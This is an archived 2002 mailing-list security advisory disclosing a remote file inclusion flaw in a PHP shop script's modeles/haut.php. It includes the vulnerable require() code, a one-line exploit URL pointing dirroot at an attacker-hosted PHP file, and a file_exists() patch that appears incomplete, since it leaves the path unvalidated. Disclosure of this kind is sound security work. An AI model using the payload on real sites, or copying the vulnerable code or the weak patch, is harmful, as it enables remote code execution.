|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Frog Man (leseulfrog_at_hotmail.com)
Date: Tue Dec 31 2002 - 09:11:05 CST
Informations :
°°°°°°°°°°°°°°
Version : 1.0b
Website : http://www.mapetite-entreprise.com
Problem : Include file
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
modeles/haut.php :
-----------------------------------------------------------
<?
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
require ($langfile);
?>
[...]
-----------------------------------------------------------
Exploit :
°°°°°°°°°
http://[target]/modeles/haut.php?dirroot=http://[attacker]&SESSION=.
with :
http://[attacker]/lang/lang.php
Patch :
°°°°°°°
In modeles/haut.php replace the lines :
-----------------------------------------------------------
<?
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
require ($langfile);
?>
-----------------------------------------------------------
by :
-----------------------------------------------------------
<?
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
if (file_exists($langfile)){
require ($langfile);
}
?>
-----------------------------------------------------------
A patch can be found on http://www.phpsecure.org
More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/PEEL.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPEEL.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m
n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]